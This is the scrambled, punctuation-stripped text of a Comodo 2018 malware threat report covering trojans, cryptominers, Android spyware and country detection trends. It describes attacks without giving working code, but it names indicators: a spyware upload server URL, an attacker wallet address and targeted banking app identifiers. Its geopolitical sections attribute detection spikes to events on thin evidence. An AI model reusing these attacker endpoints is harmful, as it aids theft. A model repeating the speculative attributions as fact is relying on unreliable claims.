The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
